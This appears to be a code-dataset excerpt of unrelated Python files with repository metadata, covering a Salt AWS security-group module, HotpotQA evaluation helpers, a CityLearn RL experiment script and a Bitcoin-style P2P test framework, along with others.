group_id=None, region=None): if name: if vpc_id is None: log.debug('getting group for {0}'.format(name)) group_filter = {'group-name': name} filtered_groups = conn.get_all_security_groups(filters=group_filter) for group in filtered_groups: if group.vpc_id is None: return group return None elif vpc_id: log.debug('getting group for {0} in vpc_id {1}'.format(name, vpc_id)) group_filter = {'group-name': name, 'vpc_id': vpc_id} filtered_groups = conn.get_all_security_groups(filters=group_filter) if len(filtered_groups) == 1: return filtered_groups[0] else: return None else: return None elif group_id: try: groups = conn.get_all_security_groups(group_ids=[group_id]) except boto.exception.BotoServerError as e: log.debug(e) return None if 
len(groups) == 1: return groups[0] else: return None else: return None def get_group_id(name, vpc_id=None, region=None, key=None, keyid=None, profile=None): conn = _get_conn(region, key, keyid, profile) if not conn: return False group = _get_group(conn, name, vpc_id, region) if group: return group.id else: return False def convert_to_group_ids(groups, vpc_id, region=None, key=None, keyid=None, profile=None): log.debug('security group contents {0} pre-conversion'.format(groups)) group_ids = [] for group in groups: if re.match('sg-.*', group): log.debug('group {0} is a group id. get_group_id not called.' .format(group)) group_ids.append(group) else: log.debug('calling boto_secgroup.get_group_id for' ' group name {0}'.format(group)) group_id = get_group_id(group, vpc_id, region, key, keyid, profile) log.debug('group name {0} has group id {1}'.format( group, group_id) ) group_ids.append(str(group_id)) log.debug('security group contents {0} post-conversion'.format(group_ids)) return group_ids def get_config(name=None, group_id=None, region=None, key=None, keyid=None, profile=None, vpc_id=None): conn = _get_conn(region, key, keyid, profile) if not conn: return None sg = _get_group(conn, name, vpc_id, group_id, region) if sg: ret = odict.OrderedDict() ret['name'] = sg.name ret['group_id'] = sg.id ret['owner_id'] = sg.owner_id ret['description'] = sg.description _rules = [] for rule in sg.rules: log.debug('examining rule {0} for group {1}'.format(rule, sg.id)) attrs = ['ip_protocol', 'from_port', 'to_port', 'grants'] _rule = odict.OrderedDict() for attr in attrs: val = getattr(rule, attr) if not val: continue if attr == 'grants': _grants = [] for grant in val: log.debug('examining grant {0} for'.format(grant)) g_attrs = {'name': 'source_group_name', 'owner_id': 'source_group_owner_id', 'group_id': 'source_group_group_id', 'cidr_ip': 'cidr_ip'} _grant = odict.OrderedDict() for g_attr, g_attr_map in six.iteritems(g_attrs): g_val = getattr(grant, g_attr) if not g_val: 
continue _grant[g_attr_map] = g_val _grants.append(_grant) _rule['grants'] = _grants elif attr == 'from_port': _rule[attr] = int(val) elif attr == 'to_port': _rule[attr] = int(val) else: _rule[attr] = val _rules.append(_rule) ret['rules'] = _split_rules(_rules) return ret else: return None def create(name, description, vpc_id=None, region=None, key=None, keyid=None, profile=None): conn = _get_conn(region, key, keyid, profile) if not conn: return False created = conn.create_security_group(name, description, vpc_id) if created: log.info('Created security group {0}.'.format(name)) return True else: msg = 'Failed to create security group {0}.'.format(name) log.error(msg) return False def delete(name=None, group_id=None, region=None, key=None, keyid=None, profile=None, vpc_id=None): conn = _get_conn(region, key, keyid, profile) if not conn: return False group = _get_group(conn, name, vpc_id, group_id, region) if group: deleted = conn.delete_security_group(group_id=group.id) if deleted: log.info('Deleted security group {0} with id {1}.'.format(group.name, group.id)) return True else: msg = 'Failed to delete security group {0}.'.format(name) log.error(msg) return False else: log.debug('Security group not found.') return False def authorize(name=None, source_group_name=None, source_group_owner_id=None, ip_protocol=None, from_port=None, to_port=None, cidr_ip=None, group_id=None, source_group_group_id=None, region=None, key=None, keyid=None, profile=None, vpc_id=None): conn = _get_conn(region, key, keyid, profile) if not conn: return False group = _get_group(conn, name, vpc_id, group_id, region) if group: try: added = conn.authorize_security_group( src_security_group_name=source_group_name, src_security_group_owner_id=source_group_owner_id, ip_protocol=ip_protocol, from_port=from_port, to_port=to_port, cidr_ip=cidr_ip, group_id=group.id, src_security_group_group_id=source_group_group_id) if added: log.info('Added rule to security group {0} with id {1}' .format(group.name, 
group.id)) return True else: msg = ('Failed to add rule to security group {0} with id {1}.' .format(group.name, group.id)) log.error(msg) return False except boto.exception.EC2ResponseError as e: log.debug(e) msg = ('Failed to add rule to security group {0} with id {1}.' .format(group.name, group.id)) log.error(msg) return False else: log.debug('Failed to add rule to security group.') return False def revoke(name=None, source_group_name=None, source_group_owner_id=None, ip_protocol=None, from_port=None, to_port=None, cidr_ip=None, group_id=None, source_group_group_id=None, region=None, key=None, keyid=None, profile=None, vpc_id=None): conn = _get_conn(region, key, keyid, profile) if not conn: return False group = _get_group(conn, name, vpc_id, group_id, region) if group: try: revoked = conn.revoke_security_group( src_security_group_name=source_group_name, src_security_group_owner_id=source_group_owner_id, ip_protocol=ip_protocol, from_port=from_port, to_port=to_port, cidr_ip=cidr_ip, group_id=group.id, src_security_group_group_id=source_group_group_id) if revoked: log.info('Removed rule from security group {0} with id {1}.' .format(group.name, group.id)) return True else: msg = ('Failed to remove rule from security group {0} with id {1}.' .format(group.name, group.id)) log.error(msg) return False except boto.exception.EC2ResponseError as e: log.debug(e) msg = ('Failed to remove rule from security group {0} with id {1}.' 
.format(group.name, group.id)) log.error(msg) return False else: log.debug('Failed to remove rule from security group.') return False def _get_conn(region, key, keyid, profile): if profile: if isinstance(profile, string_types): _profile = __salt__['config.option'](profile) elif isinstance(profile, dict): _profile = profile key = _profile.get('key', None) keyid = _profile.get('keyid', None) region = _profile.get('region', None) if not region and __salt__['config.option']('secgroup.region'): region = __salt__['config.option']('secgroup.region') if not region: region = 'us-east-1' if not key and __salt__['config.option']('secgroup.key'): key = __salt__['config.option']('secgroup.key') if not keyid and __salt__['config.option']('secgroup.keyid'): keyid = __salt__['config.option']('secgroup.keyid') try: conn = boto.ec2.connect_to_region(region, aws_access_key_id=keyid, aws_secret_access_key=key) except boto.exception.NoAuthHandlerFound: log.error('No authentication credentials found when attempting to' ' make ec2 connection for security groups.') return None return conn
true
true
f705e5539327770cb56ee6c0a5e5510efbddda11
1,677
py
Python
logic2_analyzers/DS1307/Hla.py
martonmiklos/sigrokdecoders_to_logic2_analyzers
9dd9b9a610c17e6ae525829c9112d11a80d016e7
[ "MIT" ]
5
2020-04-15T20:45:06.000Z
2020-05-31T02:45:21.000Z
logic2_analyzers/DS1307/Hla.py
martonmiklos/sigrokdecoders_to_logic2_analyzers
9dd9b9a610c17e6ae525829c9112d11a80d016e7
[ "MIT" ]
1
2020-07-15T09:23:05.000Z
2020-07-15T10:04:48.000Z
logic2_analyzers/DS1307/Hla.py
martonmiklos/sigrokdecoders_to_logic2_analyzers
9dd9b9a610c17e6ae525829c9112d11a80d016e7
[ "MIT" ]
1
2020-04-20T18:49:36.000Z
2020-04-20T18:49:36.000Z
import sys sys.path.insert(0, "../") # our fake sigrokdecode lives one dir upper from pd import Decoder class DS1307(): def __init__(self): self.sigrokDecoder = Decoder() def get_capabilities(self): settings = {} for option in self.sigrokDecoder.options : settingType = '' choices = [] if ("values" not in option) : # TODO sigrok docs does not mention that default is mandatory if (isinstance(option['default'], str)) : settingType = 'string' elif (isinstance(option['default'], int) or isinstance(option['default'], float)) : settingType = 'number' else : print("Cannot determine the type of the " + option['desc'] + " parameter from it's default value: " + option['default']) settings[option["desc"]] = { 'type': settingType } if ("values" in option) : settings[option["desc"]]['choices'] = option["values"] return { 'settings': settings } def set_settings(self, settings): # TODO handle the settings # convert sigrok's # annotations = ( # ('warning', 'Warning'), # .... # # format annotations to Logic's format self.sigrokDecoder.reset() resultTypes = {} for annotation in self.sigrokDecoder.annotations : resultTypes[annotation[0]] = annotation[1] + "{{data.data}}" return { "result_types": resultTypes } def decode(self, data): self.sigrokDecoder.processI2C(data) if (not self.packet == {}) : ret = self.generate_logic_result() self.packet = {} return ret
29.421053
137
0.57901
import sys sys.path.insert(0, "../") from pd import Decoder class DS1307(): def __init__(self): self.sigrokDecoder = Decoder() def get_capabilities(self): settings = {} for option in self.sigrokDecoder.options : settingType = '' choices = [] if ("values" not in option) : if (isinstance(option['default'], str)) : settingType = 'string' elif (isinstance(option['default'], int) or isinstance(option['default'], float)) : settingType = 'number' else : print("Cannot determine the type of the " + option['desc'] + " parameter from it's default value: " + option['default']) settings[option["desc"]] = { 'type': settingType } if ("values" in option) : settings[option["desc"]]['choices'] = option["values"] return { 'settings': settings } def set_settings(self, settings): # TODO handle the settings # convert sigrok's self.sigrokDecoder.reset() resultTypes = {} for annotation in self.sigrokDecoder.annotations : resultTypes[annotation[0]] = annotation[1] + "{{data.data}}" return { "result_types": resultTypes } def decode(self, data): self.sigrokDecoder.processI2C(data) if (not self.packet == {}) : ret = self.generate_logic_result() self.packet = {} return ret
true
true
f705e56a5a72c63a6b880ab3f1397c0082a8229a
4,774
py
Python
hotpotqa_utils_joint.py
Captainr22/SAE
f3e370604978a273eb1e1ffdbd342dee3de431c9
[ "MIT" ]
38
2020-01-23T00:46:06.000Z
2022-03-13T13:10:19.000Z
hotpotqa_utils_joint.py
Captainr22/SAE
f3e370604978a273eb1e1ffdbd342dee3de431c9
[ "MIT" ]
7
2020-02-02T02:05:32.000Z
2022-03-06T04:37:06.000Z
hotpotqa_utils_joint.py
Captainr22/SAE
f3e370604978a273eb1e1ffdbd342dee3de431c9
[ "MIT" ]
9
2020-02-12T08:35:23.000Z
2022-02-19T07:29:26.000Z
import torch import numpy as np import json, sys, re, string import collections from collections import Counter from collections import OrderedDict def get_sp_pred(pred_sp_idx, data): """get the prediction of supporting facts in original format Arguments: pred_sp_idx {[type]} -- [description] data {[type]} -- [description] """ pred = [] for p in pred_sp_idx: if p < len(data): pred.append([data[p].doc_title[0], data[p].sent_id]) return pred def process_logit(batch_index, batch_logits, predict_features, predict_examples, max_answer_length): """get predictions for each sample in the batch Arguments: batch_index {[type]} -- [description] batch_logits {[type]} -- 0: supporting facts logits, 1: answer span logits, 2: answer type logits 3: gold doc logits batch_size {[type]} -- [description] predict_file {[type]} -- [description] """ sp_logits_np = torch.sigmoid(batch_logits[0]).detach().cpu().numpy() ans_type_logits_np = batch_logits[1].detach().cpu().numpy() batch_index = batch_index.numpy().tolist() sp_pred, span_pred, ans_type_pred = [], [], [] for idx, data in enumerate(batch_index): # supporting facts prediction pred_sp_idx = [ x[0] for x in enumerate(sp_logits_np[idx,:].tolist()) if x[1] > 0.5 ] print(pred_sp_idx) if len(pred_sp_idx) != 0: sp_pred.append(get_sp_pred(pred_sp_idx, predict_examples[data])) else: sp_pred.append([]) # answer type prediction, for debug purpose ans_type_pred.append(np.argmax(ans_type_logits_np[idx,:])) # answer span prediction if ans_type_pred[-1] == 0: span_pred.append("no") elif ans_type_pred[-1] == 1: span_pred.append("yes") else: span_pred.append("") return sp_pred, span_pred, ans_type_pred # def evaluate(eval_file, answer_dict): # f1 = exact_match = total = 0 # for key, value in enumerate(answer_dict): # total += 1 # ground_truths = eval_file[key]["answer"] # prediction = value # cur_EM = exact_match_score(prediction, ground_truths) # cur_f1, _, _ = f1_score(prediction, ground_truths) # exact_match += cur_EM # f1 += cur_f1 # 
exact_match = 100.0 * exact_match / total # f1 = 100.0 * f1 / total # return {'exact_match': exact_match, 'f1': f1} def normalize_answer(s): def remove_articles(text): return re.sub(r'\b(a|an|the)\b', ' ', text) def white_space_fix(text): return ' '.join(text.split()) def remove_punc(text): exclude = set(string.punctuation) return ''.join(ch for ch in text if ch not in exclude) def lower(text): return text.lower() return white_space_fix(remove_articles(remove_punc(lower(s)))) def f1_score(prediction, ground_truth): normalized_prediction = normalize_answer(prediction) normalized_ground_truth = normalize_answer(ground_truth) ZERO_METRIC = (0, 0, 0) if normalized_prediction in ['yes', 'no', 'noanswer'] and normalized_prediction != normalized_ground_truth: return ZERO_METRIC if normalized_ground_truth in ['yes', 'no', 'noanswer'] and normalized_prediction != normalized_ground_truth: return ZERO_METRIC prediction_tokens = normalized_prediction.split() ground_truth_tokens = normalized_ground_truth.split() common = Counter(prediction_tokens) & Counter(ground_truth_tokens) num_same = sum(common.values()) if num_same == 0: return ZERO_METRIC precision = 1.0 * num_same / len(prediction_tokens) recall = 1.0 * num_same / len(ground_truth_tokens) f1 = (2 * precision * recall) / (precision + recall) return f1, precision, recall def exact_match_score(prediction, ground_truth): return (normalize_answer(prediction) == normalize_answer(ground_truth)) def write_prediction(sp_preds, answer_preds, orig_data, predict_file, output_dir): """write predictions to json file Arguments: sp_preds {[type]} -- [description] answer_preds {[type]} -- [description] orig_data {[type]} -- [description] predict_file {[type]} -- [description] output_dir {[type]} -- [description] """ if len(answer_preds) == 0: answer_preds = ["place_holder"] * len(orig_data) all_pred = {} all_pred['answer'] = OrderedDict() all_pred['sp'] = OrderedDict() for idx, data in enumerate(orig_data): 
all_pred['answer'][data['_id']] = answer_preds[idx] all_pred['sp'][data['_id']] = sp_preds[idx] with open(output_dir, 'w') as fid: json.dump(all_pred, fid)
32.47619
124
0.646418
import torch import numpy as np import json, sys, re, string import collections from collections import Counter from collections import OrderedDict def get_sp_pred(pred_sp_idx, data): pred = [] for p in pred_sp_idx: if p < len(data): pred.append([data[p].doc_title[0], data[p].sent_id]) return pred def process_logit(batch_index, batch_logits, predict_features, predict_examples, max_answer_length): sp_logits_np = torch.sigmoid(batch_logits[0]).detach().cpu().numpy() ans_type_logits_np = batch_logits[1].detach().cpu().numpy() batch_index = batch_index.numpy().tolist() sp_pred, span_pred, ans_type_pred = [], [], [] for idx, data in enumerate(batch_index): pred_sp_idx = [ x[0] for x in enumerate(sp_logits_np[idx,:].tolist()) if x[1] > 0.5 ] print(pred_sp_idx) if len(pred_sp_idx) != 0: sp_pred.append(get_sp_pred(pred_sp_idx, predict_examples[data])) else: sp_pred.append([]) ans_type_pred.append(np.argmax(ans_type_logits_np[idx,:])) if ans_type_pred[-1] == 0: span_pred.append("no") elif ans_type_pred[-1] == 1: span_pred.append("yes") else: span_pred.append("") return sp_pred, span_pred, ans_type_pred def normalize_answer(s): def remove_articles(text): return re.sub(r'\b(a|an|the)\b', ' ', text) def white_space_fix(text): return ' '.join(text.split()) def remove_punc(text): exclude = set(string.punctuation) return ''.join(ch for ch in text if ch not in exclude) def lower(text): return text.lower() return white_space_fix(remove_articles(remove_punc(lower(s)))) def f1_score(prediction, ground_truth): normalized_prediction = normalize_answer(prediction) normalized_ground_truth = normalize_answer(ground_truth) ZERO_METRIC = (0, 0, 0) if normalized_prediction in ['yes', 'no', 'noanswer'] and normalized_prediction != normalized_ground_truth: return ZERO_METRIC if normalized_ground_truth in ['yes', 'no', 'noanswer'] and normalized_prediction != normalized_ground_truth: return ZERO_METRIC prediction_tokens = normalized_prediction.split() ground_truth_tokens = 
normalized_ground_truth.split() common = Counter(prediction_tokens) & Counter(ground_truth_tokens) num_same = sum(common.values()) if num_same == 0: return ZERO_METRIC precision = 1.0 * num_same / len(prediction_tokens) recall = 1.0 * num_same / len(ground_truth_tokens) f1 = (2 * precision * recall) / (precision + recall) return f1, precision, recall def exact_match_score(prediction, ground_truth): return (normalize_answer(prediction) == normalize_answer(ground_truth)) def write_prediction(sp_preds, answer_preds, orig_data, predict_file, output_dir): if len(answer_preds) == 0: answer_preds = ["place_holder"] * len(orig_data) all_pred = {} all_pred['answer'] = OrderedDict() all_pred['sp'] = OrderedDict() for idx, data in enumerate(orig_data): all_pred['answer'][data['_id']] = answer_preds[idx] all_pred['sp'][data['_id']] = sp_preds[idx] with open(output_dir, 'w') as fid: json.dump(all_pred, fid)
true
true
f705e584e7382dd36ff080ed8c2d1c45f243aa82
255
py
Python
task/learn-python/pyramid.py
jiangdapeng/netease
032c8f7c60b8afb98bf9674cf3617f614c200a92
[ "MIT" ]
null
null
null
task/learn-python/pyramid.py
jiangdapeng/netease
032c8f7c60b8afb98bf9674cf3617f614c200a92
[ "MIT" ]
null
null
null
task/learn-python/pyramid.py
jiangdapeng/netease
032c8f7c60b8afb98bf9674cf3617f614c200a92
[ "MIT" ]
null
null
null
#!/usr/bin/python #-*-coding=utf-8-*- def pyramid(n): most = 2*n - 1 for i in range(1,n+1): star = 2*i - 1 space = n - i print(" "*space + "*"*star) def test(): pyramid(3) pyramid(4) pyramid(5) if __name__ == "__main__": test()
14.166667
31
0.529412
def pyramid(n): most = 2*n - 1 for i in range(1,n+1): star = 2*i - 1 space = n - i print(" "*space + "*"*star) def test(): pyramid(3) pyramid(4) pyramid(5) if __name__ == "__main__": test()
true
true
f705e60ad2bc78f130ddc2bedec6d3d2060f4f8b
3,309
py
Python
tests/rl_main.py
constancecrozier/CityLearn
c92f981771d29181cffce448a31d8f367a668175
[ "MIT" ]
null
null
null
tests/rl_main.py
constancecrozier/CityLearn
c92f981771d29181cffce448a31d8f367a668175
[ "MIT" ]
null
null
null
tests/rl_main.py
constancecrozier/CityLearn
c92f981771d29181cffce448a31d8f367a668175
[ "MIT" ]
null
null
null
# Run this again after editing submodules so Colab uses the updated versions from citylearn import CityLearn from citylearn import GridLearn import matplotlib.pyplot as plt from pathlib import Path from citylearn import RL_Agents_Coord, Cluster_Agents import numpy as np import csv import time import re import pandas as pd import torch from joblib import dump, load # Load environment climate_zone = 1 data_path = Path("citylearn/data/Climate_Zone_"+str(climate_zone)) building_attributes = data_path / 'building_attributes.json' weather_file = data_path / 'weather_data.csv' solar_profile = data_path / 'solar_generation_1kW.csv' building_state_actions = 'citylearn/buildings_state_action_space.json' building_id = ["Building_1","Building_2","Building_3","Building_4","Building_5","Building_6","Building_7","Building_8","Building_9"] objective_function = ['ramping','1-load_factor','average_daily_peak','peak_demand','net_electricity_consumption','quadratic','voltage_dev'] ep_period = 8760 print("Initializing the grid...") # Contain the lower and upper bounds of the states and actions, to be provided to the agent to normalize the variables between 0 and 1. 
# Can be obtained using observations_spaces[i].low or .high env = GridLearn(data_path, building_attributes, weather_file, solar_profile, building_id, 1, buildings_states_actions = building_state_actions, simulation_period = (0,ep_period), cost_function = objective_function, verbose=1, n_buildings_per_bus=1) # Hyperparameters batch_size = 254 bs = batch_size tau = 0.005 gamma = 0.99 lr = 0.0003 hid = [batch_size,batch_size] n_episodes = 3 n_training_eps = n_episodes - 1 if not (batch_size < ep_period * n_training_eps): print("will produce a key error because the neural nets won't be initialized yet") print("Initializing the agents...") # Instantiating the control agent(s) agents = RL_Agents_Coord(env, list(env.buildings.keys()), discount = gamma, batch_size = bs, replay_buffer_capacity = 1e5, regression_buffer_capacity = 12*ep_period, tau=tau, lr=lr, hidden_dim=hid, start_training=(ep_period+1)*(n_episodes-1), exploration_period = (ep_period+1)*(n_episodes)+1, start_regression=(ep_period+1), information_sharing = True, pca_compression = .95, action_scaling_coef=0.5, reward_scaling = 5., update_per_step = 1, iterations_as = 2) print("Starting the experiment...") # The number of episodes can be replaces by a stopping criterion (i.e. 
convergence of the average reward) start = time.time() for e in range(n_episodes): is_evaluating = (e > n_training_eps) # Evaluate deterministic policy after 7 epochs rewards = [] state = env.reset() done = False j = 0 print("is_deterministic", is_evaluating) action, coordination_vars = agents.select_action(state, deterministic=is_evaluating) # print(action) while not done: next_state, reward, done, _ = env.step(action) action_next, coordination_vars_next = agents.select_action(next_state, deterministic=is_evaluating) agents.add_to_buffer(state, action, reward, next_state, done, coordination_vars, coordination_vars_next) state = next_state coordination_vars = coordination_vars_next action = action_next print('Loss -',env.cost(), 'Simulation time (min) -',(time.time()-start)/60.0)
44.716216
463
0.767604
from citylearn import CityLearn from citylearn import GridLearn import matplotlib.pyplot as plt from pathlib import Path from citylearn import RL_Agents_Coord, Cluster_Agents import numpy as np import csv import time import re import pandas as pd import torch from joblib import dump, load climate_zone = 1 data_path = Path("citylearn/data/Climate_Zone_"+str(climate_zone)) building_attributes = data_path / 'building_attributes.json' weather_file = data_path / 'weather_data.csv' solar_profile = data_path / 'solar_generation_1kW.csv' building_state_actions = 'citylearn/buildings_state_action_space.json' building_id = ["Building_1","Building_2","Building_3","Building_4","Building_5","Building_6","Building_7","Building_8","Building_9"] objective_function = ['ramping','1-load_factor','average_daily_peak','peak_demand','net_electricity_consumption','quadratic','voltage_dev'] ep_period = 8760 print("Initializing the grid...") env = GridLearn(data_path, building_attributes, weather_file, solar_profile, building_id, 1, buildings_states_actions = building_state_actions, simulation_period = (0,ep_period), cost_function = objective_function, verbose=1, n_buildings_per_bus=1) batch_size = 254 bs = batch_size tau = 0.005 gamma = 0.99 lr = 0.0003 hid = [batch_size,batch_size] n_episodes = 3 n_training_eps = n_episodes - 1 if not (batch_size < ep_period * n_training_eps): print("will produce a key error because the neural nets won't be initialized yet") print("Initializing the agents...") # Instantiating the control agent(s) agents = RL_Agents_Coord(env, list(env.buildings.keys()), discount = gamma, batch_size = bs, replay_buffer_capacity = 1e5, regression_buffer_capacity = 12*ep_period, tau=tau, lr=lr, hidden_dim=hid, start_training=(ep_period+1)*(n_episodes-1), exploration_period = (ep_period+1)*(n_episodes)+1, start_regression=(ep_period+1), information_sharing = True, pca_compression = .95, action_scaling_coef=0.5, reward_scaling = 5., update_per_step = 1, iterations_as = 2) 
print("Starting the experiment...") # The number of episodes can be replaces by a stopping criterion (i.e. convergence of the average reward) start = time.time() for e in range(n_episodes): is_evaluating = (e > n_training_eps) # Evaluate deterministic policy after 7 epochs rewards = [] state = env.reset() done = False j = 0 print("is_deterministic", is_evaluating) action, coordination_vars = agents.select_action(state, deterministic=is_evaluating) # print(action) while not done: next_state, reward, done, _ = env.step(action) action_next, coordination_vars_next = agents.select_action(next_state, deterministic=is_evaluating) agents.add_to_buffer(state, action, reward, next_state, done, coordination_vars, coordination_vars_next) state = next_state coordination_vars = coordination_vars_next action = action_next print('Loss -',env.cost(), 'Simulation time (min) -',(time.time()-start)/60.0)
true
true
f705e769068d5766e5f862e7c150a7e010365ee9
675
py
Python
base/flags.py
d2lam/common
3db9ac8fc46c2159568180ca1188dfa3aeacd7cb
[ "BSD-3-Clause" ]
1
2016-09-29T14:17:27.000Z
2016-09-29T14:17:27.000Z
base/flags.py
d2lam/common
3db9ac8fc46c2159568180ca1188dfa3aeacd7cb
[ "BSD-3-Clause" ]
null
null
null
base/flags.py
d2lam/common
3db9ac8fc46c2159568180ca1188dfa3aeacd7cb
[ "BSD-3-Clause" ]
null
null
null
# Copyright 2013 # Author: Christopher Van Arsdale # # See common/third_party/google/gflags_python/gflags for info # # Examlpe: # import common.base.flags # import sys # # FLAGS = flags.FLAGS # flags.d.DEFINE_bool('my_bool', false, 'My description') # # def main(argv): # flags.Parse(argv) # ... use FLAGS.my_bool as boolean ... # # if __name__ == "__main__": # main(sys.argv) import common.third_party.google.gflags_python.gflags as gflags # Interface simplification d = gflags FLAGS = gflags.FLAGS def Parse(argv): try: argv = FLAGS(argv) except gflags.FlagsError, e: print '%s\\nUsage: %s ARGS\\n%s' % (e, sys.argv[0], FLAGS) sys.exit(1)
21.09375
63
0.678519
import common.third_party.google.gflags_python.gflags as gflags d = gflags FLAGS = gflags.FLAGS def Parse(argv): try: argv = FLAGS(argv) except gflags.FlagsError, e: print '%s\\nUsage: %s ARGS\\n%s' % (e, sys.argv[0], FLAGS) sys.exit(1)
false
true
f705e793f8a0fdc1881cae42982b88bb9cb07532
16,656
py
Python
test/functional/test_framework/mininode.py
Actinium-project/acmcore-actinium-next
4b2b56d034d19ba41907c30b91948ed4bc8322ad
[ "MIT" ]
null
null
null
test/functional/test_framework/mininode.py
Actinium-project/acmcore-actinium-next
4b2b56d034d19ba41907c30b91948ed4bc8322ad
[ "MIT" ]
null
null
null
test/functional/test_framework/mininode.py
Actinium-project/acmcore-actinium-next
4b2b56d034d19ba41907c30b91948ed4bc8322ad
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # Copyright (c) 2010 ArtForz -- public domain half-a-node # Copyright (c) 2012 Jeff Garzik # Copyright (c) 2010-2017 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Bitcoin P2P network half-a-node. This python code was modified from ArtForz' public domain half-a-node, as found in the mini-node branch of http://github.com/jgarzik/pynode. P2PConnection: A low-level connection object to a node's P2P interface P2PInterface: A high-level interface object for communicating to a node over P2P""" import asyncore from collections import defaultdict from io import BytesIO import logging import socket import struct import sys import threading from test_framework.messages import * from test_framework.util import wait_until logger = logging.getLogger("TestFramework.mininode") MESSAGEMAP = { b"addr": msg_addr, b"block": msg_block, b"blocktxn": msg_blocktxn, b"cmpctblock": msg_cmpctblock, b"feefilter": msg_feefilter, b"getaddr": msg_getaddr, b"getblocks": msg_getblocks, b"getblocktxn": msg_getblocktxn, b"getdata": msg_getdata, b"getheaders": msg_getheaders, b"headers": msg_headers, b"inv": msg_inv, b"mempool": msg_mempool, b"ping": msg_ping, b"pong": msg_pong, b"reject": msg_reject, b"sendcmpct": msg_sendcmpct, b"sendheaders": msg_sendheaders, b"tx": msg_tx, b"verack": msg_verack, b"version": msg_version, } MAGIC_BYTES = { "mainnet": b"\xfb\xc0\xb6\xdb", # mainnet "testnet4": b"\xfd\xd2\xc8\xf1", # testnet3 "regtest": b"\xfa\xbf\xb5\xda", # regtest } class P2PConnection(asyncore.dispatcher): """A low-level connection object to a node's P2P interface. 
This class is responsible for: - opening and closing the TCP connection to the node - reading bytes from and writing bytes to the socket - deserializing and serializing the P2P message header - logging messages as they are sent and received This class contains no logic for handing the P2P message payloads. It must be sub-classed and the on_message() callback overridden.""" def __init__(self): # All P2PConnections must be created before starting the NetworkThread. # assert that the network thread is not running. assert not network_thread_running() super().__init__(map=mininode_socket_map) def peer_connect(self, dstaddr, dstport, net="regtest"): self.dstaddr = dstaddr self.dstport = dstport self.create_socket(socket.AF_INET, socket.SOCK_STREAM) self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) self.sendbuf = b"" self.recvbuf = b"" self.state = "connecting" self.network = net self.disconnect = False logger.info('Connecting to Actinium Node: %s:%d' % (self.dstaddr, self.dstport)) try: self.connect((dstaddr, dstport)) except: self.handle_close() def peer_disconnect(self): # Connection could have already been closed by other end. if self.state == "connected": self.disconnect_node() # Connection and disconnection methods def handle_connect(self): """asyncore callback when a connection is opened.""" if self.state != "connected": logger.debug("Connected & Listening: %s:%d" % (self.dstaddr, self.dstport)) self.state = "connected" self.on_open() def handle_close(self): """asyncore callback when a connection is closed.""" logger.debug("Closing connection to: %s:%d" % (self.dstaddr, self.dstport)) self.state = "closed" self.recvbuf = b"" self.sendbuf = b"" try: self.close() except: pass self.on_close() def disconnect_node(self): """Disconnect the p2p connection. Called by the test logic thread. 
Causes the p2p connection to be disconnected on the next iteration of the asyncore loop.""" self.disconnect = True # Socket read methods def handle_read(self): """asyncore callback when data is read from the socket.""" t = self.recv(8192) if len(t) > 0: self.recvbuf += t self._on_data() def _on_data(self): """Try to read P2P messages from the recv buffer. This method reads data from the buffer in a loop. It deserializes, parses and verifies the P2P header, then passes the P2P payload to the on_message callback for processing.""" try: while True: if len(self.recvbuf) < 4: return if self.recvbuf[:4] != MAGIC_BYTES[self.network]: raise ValueError("got garbage %s" % repr(self.recvbuf)) if len(self.recvbuf) < 4 + 12 + 4 + 4: return command = self.recvbuf[4:4+12].split(b"\x00", 1)[0] msglen = struct.unpack("<i", self.recvbuf[4+12:4+12+4])[0] checksum = self.recvbuf[4+12+4:4+12+4+4] if len(self.recvbuf) < 4 + 12 + 4 + 4 + msglen: return msg = self.recvbuf[4+12+4+4:4+12+4+4+msglen] th = sha256(msg) h = sha256(th) if checksum != h[:4]: raise ValueError("got bad checksum " + repr(self.recvbuf)) self.recvbuf = self.recvbuf[4+12+4+4+msglen:] if command not in MESSAGEMAP: raise ValueError("Received unknown command from %s:%d: '%s' %s" % (self.dstaddr, self.dstport, command, repr(msg))) f = BytesIO(msg) t = MESSAGEMAP[command]() t.deserialize(f) self._log_message("receive", t) self.on_message(t) except Exception as e: logger.exception('Error reading message:', repr(e)) raise def on_message(self, message): """Callback for processing a P2P payload. 
Must be overridden by derived class.""" raise NotImplementedError # Socket write methods def writable(self): """asyncore method to determine whether the handle_write() callback should be called on the next loop.""" with mininode_lock: pre_connection = self.state == "connecting" length = len(self.sendbuf) return (length > 0 or pre_connection) def handle_write(self): """asyncore callback when data should be written to the socket.""" with mininode_lock: # asyncore does not expose socket connection, only the first read/write # event, thus we must check connection manually here to know when we # actually connect if self.state == "connecting": self.handle_connect() if not self.writable(): return try: sent = self.send(self.sendbuf) except: self.handle_close() return self.sendbuf = self.sendbuf[sent:] def send_message(self, message, pushbuf=False): """Send a P2P message over the socket. This method takes a P2P payload, builds the P2P header and adds the message to the send buffer to be sent over the socket.""" if self.state != "connected" and not pushbuf: raise IOError('Not connected, no pushbuf') self._log_message("send", message) command = message.command data = message.serialize() tmsg = MAGIC_BYTES[self.network] tmsg += command tmsg += b"\x00" * (12 - len(command)) tmsg += struct.pack("<I", len(data)) th = sha256(data) h = sha256(th) tmsg += h[:4] tmsg += data with mininode_lock: if (len(self.sendbuf) == 0 and not pushbuf): try: sent = self.send(tmsg) self.sendbuf = tmsg[sent:] except BlockingIOError: self.sendbuf = tmsg else: self.sendbuf += tmsg # Class utility methods def _log_message(self, direction, msg): """Logs a message being sent or received over the connection.""" if direction == "send": log_message = "Send message to " elif direction == "receive": log_message = "Received message from " log_message += "%s:%d: %s" % (self.dstaddr, self.dstport, repr(msg)[:500]) if len(log_message) > 500: log_message += "... 
